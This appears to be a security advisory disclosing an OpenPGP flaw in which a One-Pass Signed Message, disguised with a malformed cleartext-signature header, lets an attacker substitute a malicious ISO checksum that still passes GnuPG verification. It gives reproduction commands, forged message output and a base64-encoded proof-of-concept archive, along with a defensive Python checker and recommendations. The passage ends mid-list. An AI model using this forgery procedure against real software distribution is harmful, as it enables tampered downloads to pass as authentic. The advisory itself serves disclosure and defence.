OpenPGP Cleartext Signature Framework Susceptible to Format Confusion
An attacker can exploit ambiguous OpenPGP format syntax to deceive users into misinterpreting an ASCII-armored One-Pass Signed Message as a Cleartext Signature Framework message through a malformed header.
Impact
This format confusion enables substitution of the original signed data with malicious content while retaining a seemingly valid cryptographic verification. Users and automated checks may unknowingly accept altered or spoofed payloads as authentic, because popular PGP implementations such as GnuPG do not, by default, display the actual data bound by the signature during validation.
Despite documented issues with the Cleartext Signature Framework and GnuPG recommending against it, usage of cleartext signatures remains prevalent.
The attack requires a valid OpenPGP signature over data that is known to the attacker but not chosen by them.
Details
The attack disguises a One-Pass Signed Message (e.g. created with gpg --sign) as a Cleartext Signature Framework message (gpg --clearsign).
RFC 9580 mandates that a One-Pass Signed Message consists of the following packets:
- a One-Pass Signature Packet: unprotected metadata, including:
  - hash algorithm,
  - public key algorithm,
  - short key ID of the signing key.
- a Literal Data Packet: the signed data.
- a Signature Packet: a binding between some public key and some data.
Any OpenPGP signature format that carries a valid Signature Packet alongside the signed data, such as the Cleartext Signature Framework, can be converted to a One-Pass Signed Message by:
- forging a One-Pass Signature Packet (it contains no cryptographically protected contents),
- encoding the signed data in a Literal Data Packet, and
- copying the Signature Packet unchanged.
Since the conversion preserves both the signed data and the signature, cryptographic integrity remains intact. No keying material, neither private nor public, is required to perform the conversion; a Python script for this procedure is provided in the appendix as a proof of concept.
The attack leverages the ambiguity of the OpenPGP Armor Header Line, which allows a One-Pass Signed Message to be wrapped in either BEGIN PGP MESSAGE or BEGIN PGP SIGNATURE armor.
Additionally, the OpenPGP specification does not mandate any particular handling of non-whitespace characters preceding or following an ASCII-armored OpenPGP message.
A recipient of an OpenPGP signature can therefore be deceived by an adversary through a malformed Armor Header Line into incorrectly assuming that the Cleartext Signature Framework was used. This allows arbitrary data to be inserted that the user incorrectly believes to be signed.
Common OpenPGP implementations silently discard any superfluous data preceding the One-Pass Signed Message, including malformed Armor Header Lines. The One-Pass Signed Message subsequently passes cryptographic validation. By default, GnuPG does not output the signed data during validation, which further helps in deceiving the user.
Detailed steps to reproduce
Scenario
Alice wants to transmit a file (UwUntu.iso) to Bob. Alice wants to assert her authorship and prevent manipulations to the file. Alice has created an OpenPGP keypair and securely transferred her public key to Bob.
Mallory is a threat actor able to intercept and manipulate communications between Alice and Bob. Her goal is to replace the legitimate file (UwUntu.iso) with her malicious one (EnterpriseLinux.iso) while seemingly preserving valid cryptographic verification.
UwUntu.iso and EnterpriseLinux.iso differ in their contents and thus their SHA256 checksums.
Mallory possesses neither private nor public keying material used by Alice.
Mallory did not interfere with the initial key exchange between Alice and Bob.
Procedure
Alice decides to clearsign the SHA256 checksum of UwUntu.iso:
sha256sum --tag UwUntu.iso | gpg --clearsign --local-user [email protected] --armor | tee UwUntu.iso-CHECKSUM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-----BEGIN PGP SIGNATURE-----
iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ
c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA
VHK9nCInS1fNKbWo8NiedYVOXnISOgs=
=a6YF
-----END PGP SIGNATURE-----
Alice then transmits UwUntu.iso and UwUntu.iso-CHECKSUM to Bob.
Mallory intercepts this transmission. She converts the Cleartext Signature into a One-Pass Signed Message that she disguises as a Cleartext Signature:
$ python fake-signature/main.py ./UwUntu.iso-CHECKSUM /dev/stdout
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512
<insert your message here>
-----BEGIN PGP SIGNATURE-----
kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
Mallory replaces <insert your message here> with the checksum tag of her malicious EnterpriseLinux.iso:
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512
SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9
-----BEGIN PGP SIGNATURE-----
kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
Mallory replaces the contents of UwUntu.iso with those of EnterpriseLinux.iso.
Having modified both UwUntu.iso and the signature UwUntu.iso-CHECKSUM, Mallory forwards the files to Bob.
Bob verifies the signature:
$ cat ./UwUntu.iso-CHECKSUM | gpg --verify
gpg: Signature made Sun Jul 6 17:10:24 2025 CEST
gpg: using EDDSA key E81E1001FC831508C5AC7CEF00D80363D1094973
gpg: Good signature from "Alice <[email protected]>" [ultimate]
Confident in the legitimacy of UwUntu.iso-CHECKSUM, Bob verifies that UwUntu.iso actually matches UwUntu.iso-CHECKSUM:
sha256sum --check UwUntu.iso-CHECKSUM
UwUntu.iso: OK
Mallory's attack has succeeded: she deceived Bob into believing that the manipulated UwUntu.iso was cryptographically signed by Alice.
The verification workflow combining cleartext signatures with SHA256 checksums is used by several well-known software distributions; the issue therefore extends beyond this theoretical example.
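The confusion described above comes down to two checks a verifier can apply before treating a file as a cleartext signature: the first non-blank line must be the exact Armor Header Line from RFC 9580 (five dashes on each side), and the armored payload after BEGIN PGP SIGNATURE must start with a Signature Packet (tag 2) rather than a One-Pass Signature Packet (tag 4). The following Python script is an added example, not part of this advisory or of the fake-signature proof of concept; it runs both checks over the two messages shown above (embedded as sample input, with the blank armor separator lines restored) and extracts the dash-unescaped cleartext so that only verifier output is used downstream. All function and variable names are the example's own.

```python
import base64
import re

# Exact Armor Header Lines from RFC 9580; a cleartext signature must open
# with CSF_HEADER (five dashes on each side) and carry a SIGNATURE block.
CSF_HEADER = "-----BEGIN PGP SIGNED MESSAGE-----"
SIG_BEGIN = "-----BEGIN PGP SIGNATURE-----"
SIG_END = "-----END PGP SIGNATURE-----"
ARMOR_HEADER_RE = re.compile(r"^[A-Za-z-]+: ")  # "Hash: SHA512", "Version: ..."

# Packet tags from RFC 9580 section 5 that matter for this check.
TAG_NAMES = {2: "Signature", 4: "One-Pass Signature", 11: "Literal Data"}

# Sample inputs copied from the advisory (blank armor separator lines restored):
# Alice's genuine cleartext signature, and Mallory's One-Pass Signed Message
# disguised with a malformed header (six trailing dashes).
GENUINE = """-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ
c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA
VHK9nCInS1fNKbWo8NiedYVOXnISOgs=
=a6YF
-----END PGP SIGNATURE-----
"""

FORGED = """-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9
-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
"""


def first_packet_tag(data: bytes) -> int:
    """Tag of the first OpenPGP packet (RFC 9580 section 4.2 header formats)."""
    if not data or not data[0] & 0x80:
        raise ValueError("not an OpenPGP packet header")
    ctb = data[0]
    if ctb & 0x40:               # new format: tag is the low six bits
        return ctb & 0x3F
    return (ctb >> 2) & 0x0F     # old format: tag is bits 2..5


def inspect_cleartext_signature(text: str) -> dict:
    """Classify a purported cleartext signature without trusting its header."""
    lines = text.splitlines()
    first = next((i for i, line in enumerate(lines) if line.strip()), None)
    if first is None or SIG_BEGIN not in lines or SIG_END not in lines:
        raise ValueError("no armored cleartext signature found")
    # Check 1: the first non-blank line must be the exact Armor Header Line,
    # so leading junk or a malformed header is rejected instead of ignored.
    header_line = lines[first]
    sig_at, end_at = lines.index(SIG_BEGIN), lines.index(SIG_END)
    # Recover the text a verifier would actually hash: skip the Hash headers
    # and the single blank separator, then undo RFC 9580 dash-escaping.
    body = first + 1
    while body < sig_at and ARMOR_HEADER_RE.match(lines[body]):
        body += 1
    if body < sig_at and lines[body] == "":
        body += 1
    cleartext = "\n".join(ln[2:] if ln.startswith("- ") else ln
                          for ln in lines[body:sig_at])
    # Check 2: the armored payload must begin with a Signature Packet (tag 2);
    # a One-Pass Signature Packet (tag 4) means a One-Pass Signed Message.
    b64 = []
    for line in lines[sig_at + 1:end_at]:
        if line.startswith("="):        # CRC-24 line terminates the payload
            break
        if line and not ARMOR_HEADER_RE.match(line):
            b64.append(line)
    tag = first_packet_tag(base64.b64decode("".join(b64)))
    return {
        "header_line": header_line,
        "header_ok": header_line == CSF_HEADER,
        "first_packet_tag": tag,
        "first_packet": TAG_NAMES.get(tag, f"tag {tag}"),
        "cleartext": cleartext,
        "is_cleartext_signature": header_line == CSF_HEADER and tag == 2,
    }


if __name__ == "__main__":
    for name, sample in (("genuine", GENUINE), ("forged", FORGED)):
        r = inspect_cleartext_signature(sample)
        print(f"{name}: header_ok={r['header_ok']} first_packet={r['first_packet']} "
              f"cleartext_signature={r['is_cleartext_signature']}")
```

The script does not verify the signature itself; it is a pre-check that refuses to read a file as a cleartext signature when its header is not exact or when the payload opens with a One-Pass Signature Packet, which is exactly the shape of Mallory's file. For the genuine message it returns the checksum line as the cleartext, and that returned text, not the raw file, is what should be handed to sha256sum --check.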
Recommendations
Removing the Cleartext Signature Framework from the OpenPGP standard would resolve its issues; deprecating it first allows for a graceful phase-out.
OpenPGP users should avoid using cleartext signatures, as is also recommended by GnuPG.
To prevent confusion about the actual signed data, OpenPGP implementations should output the data bound by the signature during validation by default. sequoia-sq does so. GnuPG does not and requires the --output option to be set.
When working with OpenPGP signatures in general, users should instruct their PGP implementation to output the signed data and only use this output for any further or related tasks.
Credits
- Finder credits: 49016
- PoC & writeup: 49016, Flüpke, Sivizius, Liam
Appendix
fake-signature.tar.xz.b64
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
yi0RscRn+wIAAAAABFla
Disclosure Timeline:
- 21.10.2025: Submission of initial version of this report.
Upcoming Timeline:
- 24.10.2025: Submission of a talk for 39th Chaos Communication Congress (39C3). No technical details shared.
- 21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/
- 26-31.12.2025: If accepted by content team, 39C3 Congress talk regarding this report
Please note: While we might be able to offer some flexibility, our plan is to adhere to the above-stated upcoming timeline, regardless of the availability of patches or fixes.
We kindly request allocation of a CVE number to track this issue. Please keep us updated regarding your remediation efforts.
Thank you
Best, Liam
Recommended patches
Shared:
- Phasing out cleartext signatures completely is suggested. This requires a new OpenPGP standard version and a deprecation period, and is not possible before the disclosure deadline.
For GPG:
2. Only verify cleartext signatures if an explicit cleartext verification option is provided. Prevents confusion of signature format. Verification could fail if an expected cleartext signature is malformed.
3. Always output the data that was actually verified, at least for cleartext signatures and One-Pass signatures. Might be problematic because of binary output and output limits.
- Alternatively, output a warning if output option is not used.
For Sequoia:
